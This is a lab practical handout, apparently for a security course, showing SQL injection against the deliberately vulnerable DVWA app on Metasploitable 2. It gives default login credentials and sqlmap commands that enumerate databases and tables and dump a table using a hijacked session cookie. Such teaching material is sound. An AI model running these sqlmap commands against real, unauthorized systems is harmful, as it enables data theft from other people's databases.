PRACTICAL NO. 8

Aim: To perform SQL Injection on a data-driven web application using SQLmap.

Procedure: SQL Injection Using SQLmap (DVWA)
Step 1: Access Metasploitable 2

Note the IP address of the Metasploitable 2 machine.
Open the IP address in the browser of the Kali Linux machine.

http://<TARGET_IP>/

Step 2: Login to DVWA

Select DVWA from the menu.
Login using the following credentials:

Username: admin

Password: password

Step 3: Set Security Level

From the left panel, click DVWA Security.
Set the security level to Low and click Submit.

Step 4: Open SQL Injection Page

From the left panel, select SQL Injection.
Enter any number (e.g., 1) in the input field and submit.
Copy the vulnerable URL from the address bar.

http://<TARGET_IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Step 5: Obtain PHPSESSID

Right-click on the DVWA page → Inspect.
Go to Storage / Application tab.
Copy the value of PHPSESSID.

SQLmap Exploitation Steps
Step 6: Enumerate Databases

Use SQLmap to identify all available databases.

sqlmap -u "http://<TARGET_IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=<SESSION_ID>; security=low" \
--batch --dbs

Step 7: Enumerate Tables in DVWA Database

List all tables present in the DVWA database.

sqlmap -u "http://<TARGET_IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=<SESSION_ID>; security=low" \
-D dvwa --tables --batch

Step 8: Dump Data from Guestbook Table

Extract and display records from the guestbook table.

sqlmap -u "http://<TARGET_IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=<SESSION_ID>; security=low" \
-D dvwa -T guestbook --dump --batch

Result

SQL Injection was successfully performed using SQLmap.
Databases, tables, and sensitive data from the DVWA application were extracted.